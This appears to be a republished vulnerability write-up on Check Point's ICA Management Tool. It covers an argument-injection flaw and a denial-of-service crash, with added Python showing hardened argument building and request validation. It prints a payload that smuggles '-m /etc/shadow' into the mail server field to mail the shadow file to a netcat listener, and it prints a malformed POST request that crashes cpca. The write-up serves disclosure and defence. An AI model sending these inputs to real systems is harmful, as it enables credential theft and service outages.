
What the Check Point ICA Management Tool is used for, and two vulnerabilities found in it

2025-01-23 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article introduces the Check Point ICA Management Tool and two vulnerabilities found in it. It goes into some detail and should serve as a useful reference for interested readers.

In this article we analyze several security vulnerabilities we found in the Check Point ICA Management Tool, a component of the Check Point security management suite that ships with many Check Point products.

The ICA (Internal Certificate Authority) Management Tool is a web interface for managing user certificates. It lets an administrator:

Run search

Recreate CRLs

Configure ICA

Delete expired certificates

By default this service is turned off; it is enabled with the built-in cpca_client utility:

cpca_client set_mgmt_tool on -no_ssl

Note that with -no_ssl, anyone who can reach the port can use the service without authentication. We therefore recommend running the service only over SSL. SSL is enabled with the following command and a pre-generated certificate; the -u option takes the DN of the user whose certificate is allowed to authenticate to the tool:

cpca_client set_mgmt_tool on -u <user DN>

Once the component is enabled, the ICA Management Tool's web interface is reachable at http://<host>:18265/. For the analysis below we enabled the component without SSL.

During our analysis of the ICA Management Tool we found the following two vulnerabilities.

Parameter injection vulnerability

The first vulnerability is a form of argument injection, a close relative of command injection: when the application builds the command line of an internal system command from user-supplied parameters, an attacker can smuggle additional arguments into it. During the analysis we used this to add our own options to an internal command invocation and have them honoured.

A notable feature of the web interface is sending notification e-mails to users about certificate initialization, with the standard mail headers (sender, recipient, subject) and the mail server address remaining editable. Our first attempt was to inject a shell command through the mail server address parameter, in the style of the classic "ping" injection that abuses poor input validation, but this did not work: the value is not executed through /bin/sh.

Next we had to identify the process responsible for sending mail. A likely candidate is the "cpca" process, since it is what listens on port 18265. A string search in the binary located the code that interacts with e-mail, which became our target. Notably, the cpca binary contains the string "send_mail_file.txt", which suggests it can send files as attachments. To build the injection string we needed the command-line syntax of the sendmail helper it invokes:

sendmail [-t server] [[-m filename] | [-s subject] [-f from] email-address]

Even so, we could not tell from the binary in what order the arguments are assembled, so we took another route: we appended sendmail options to the web interface parameters and used logging to confirm that the file named in the injected -m option was sent to an attacker-controlled mail server.

To exploit this, listen with nc on local port 25, then, when configuring the CA, set the management tool's mail server field to "127.0.0.1 -m /etc/shadow%0a%0a". Note the two trailing newlines ("\n\n", URL-encoded as %0a%0a) at the end of the field.

Next, send the request that triggers the mail; its certs parameter carries the certificate ID and the mail status.

The contents of /etc/shadow then arrive on the nc listener on port 25.
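The following is an added example, not Check Point's code and not taken from the original report. It models the argument-injection bug class described above (the mail server field smuggling an extra -m option into the sendmail helper, as the "127.0.0.1 -m /etc/shadow" payload does) alongside a hardened builder that rejects the payload. The helper name, the whitespace-splitting construction, the toy option parser and the validation rules are all assumptions made for illustration.

```python
"""Argument injection into a sendmail-style helper: vulnerable vs. hardened.

Added example, not Check Point's code. It models the bug class described
above: a web-form value (the mail server field) is concatenated into the
command line of an internal helper whose usage is

    sendmail [-t server] [[-m filename] | [-s subject] [-f from] email-address]

The helper name, the whitespace-splitting construction, the mini option
parser and the hardened builder are all assumptions made for illustration.
"""
import ipaddress
import re

SENDMAIL = "sendmail"  # hypothetical helper name; the real path is not given on the page

# Constructed payload mirroring the article: a host, an injected -m option,
# then two newlines ("%0a%0a" once URL-decoded).
PAYLOAD = "127.0.0.1 -m /etc/shadow\n\n"


def build_argv_vulnerable(server, sender, subject, recipient):
    """Build one command string and split it on whitespace (the flaw).

    Whitespace inside `server` becomes extra argv elements, so the attacker
    controls options, not just the value of -t.
    """
    cmd = f"{SENDMAIL} -t {server} -s {subject} -f {sender} {recipient}"
    return cmd.split()


def parse_sendmail_argv(argv):
    """Toy option parser following the usage line above.

    `attachment` is set when -m is present. This is an illustrative model,
    not the real helper's parser.
    """
    opts = {"server": None, "attachment": None, "subject": None,
            "sender": None, "recipient": None}
    tokens = iter(argv[1:])
    for tok in tokens:
        if tok == "-t":
            opts["server"] = next(tokens)
        elif tok == "-m":
            opts["attachment"] = next(tokens)
        elif tok == "-s":
            opts["subject"] = next(tokens)
        elif tok == "-f":
            opts["sender"] = next(tokens)
        else:
            opts["recipient"] = tok
    return opts


# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens.
_HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_mail_server(server):
    """Accept only an IP literal or a DNS hostname; anything else is rejected.

    Whitespace, newlines and option-looking tokens all fail this check.
    """
    if not server or len(server) > 253:
        raise ValueError("mail server value is empty or too long")
    try:
        ipaddress.ip_address(server)
        return server
    except ValueError:
        pass
    if not _HOSTNAME_RE.fullmatch(server):
        raise ValueError(f"invalid mail server value: {server!r}")
    return server


def build_argv_hardened(server, sender, subject, recipient):
    """Validate the server field and keep every value as its own argv element.

    Handed to an execv-style API, a list element containing spaces or
    newlines stays one argument and can never become a new option.
    """
    return [SENDMAIL, "-t", validate_mail_server(server),
            "-s", subject, "-f", sender, recipient]


if __name__ == "__main__":
    args = ("ca@example.com", "Certificate_issued", "user@example.com")
    print(parse_sendmail_argv(build_argv_vulnerable(PAYLOAD, *args)))
    try:
        build_argv_hardened(PAYLOAD, *args)
    except ValueError as exc:
        print("hardened builder rejected payload:", exc)
```

Run as a script, the vulnerable builder yields an argv in which "/etc/shadow" has become the -m attachment, while the hardened builder refuses the same field value. The two fixes are independent and both matter: strict validation of the value, and passing the values as separate argv elements rather than as one string that gets re-split.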

Denial of service vulnerability

The denial-of-service vulnerability in this component stems from missing validation of user input. If a remote client sends a specially crafted POST request whose body is formatted abnormally, the program terminates unexpectedly.

To verify this vulnerability, we sent the following POST request (one header per line):

POST /file_init?_ HTTP/1.1
Host: checkpoint.host:18265
Cookie: _
Content-Length: 1

q

After receiving this request, cpca crashes.
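The following is an added example, not Check Point's code. The article attributes the crash to missing validation of the POST request but does not say which field cpca mishandles, so this does not reproduce the crash; it shows the kind of front-door request validation that would reject the request above before any handler sees it. Both requests in the block are constructed: the first is the article's request with CRLF line endings restored, the second a well-formed request of the same shape assumed for comparison.

```python
"""Strict parsing of a raw HTTP request before it reaches application code.

Added example, not Check Point's code. The rejection rules (name=value
pairs in query string, cookie and form body; Content-Length matching the
body; Content-Type present on a POST with a body) are this example's own.
"""

# Constructed: the article's request, one header per line.
MALFORMED_REQUEST = (
    b"POST /file_init?_ HTTP/1.1\r\n"
    b"Host: checkpoint.host:18265\r\n"
    b"Cookie: _\r\n"
    b"Content-Length: 1\r\n"
    b"\r\n"
    b"q"
)

# Constructed: an assumed well-formed request to the same path.
WELL_FORMED_REQUEST = (
    b"POST /file_init HTTP/1.1\r\n"
    b"Host: checkpoint.host:18265\r\n"
    b"Cookie: session=abc123\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 11\r\n"
    b"\r\n"
    b"certs=12345"
)


def _pairs_ok(blob, sep):
    """True if every non-empty `sep`-separated item is a name=value pair."""
    for item in blob.split(sep):
        item = item.strip()
        if not item:
            continue
        name, eq, _value = item.partition(b"=")
        if not eq or not name:
            return False
    return True


def validate_request(raw):
    """Return a list of problems found; an empty list means the request passes."""
    problems = []
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["no end-of-headers marker"]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, version = parts
    if version not in (b"HTTP/1.0", b"HTTP/1.1"):
        problems.append("unsupported HTTP version")

    headers = {}
    for line in lines[1:]:
        name, colon, value = line.partition(b":")
        if not colon or not name.strip() or b" " in name.strip():
            problems.append("malformed header line")
            continue
        headers[name.strip().lower()] = value.strip()

    # Query string and cookie must consist of name=value pairs.
    if b"?" in target and not _pairs_ok(target.split(b"?", 1)[1], b"&"):
        problems.append("query string is not name=value pairs")
    if b"cookie" in headers and not _pairs_ok(headers[b"cookie"], b";"):
        problems.append("cookie is not name=value pairs")

    if method == b"POST":
        length = headers.get(b"content-length")
        if length is None or not length.isdigit():
            problems.append("POST without a numeric Content-Length")
        elif int(length) != len(body):
            problems.append("Content-Length does not match body size")
        ctype = headers.get(b"content-type", b"")
        if body and not ctype:
            problems.append("POST body without Content-Type")
        if ctype.startswith(b"application/x-www-form-urlencoded") and not _pairs_ok(body, b"&"):
            problems.append("form body is not name=value pairs")
    return problems


if __name__ == "__main__":
    for label, req in (("malformed", MALFORMED_REQUEST), ("well-formed", WELL_FORMED_REQUEST)):
        print(label, validate_request(req) or ["ok"])
```

For the article's request the validator reports the bare "_" query string, the bare "_" cookie and the untyped one-byte body; the well-formed request passes. A service that parses headers and body into fixed structures only after such checks is far less likely to be taken down by a single odd request.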
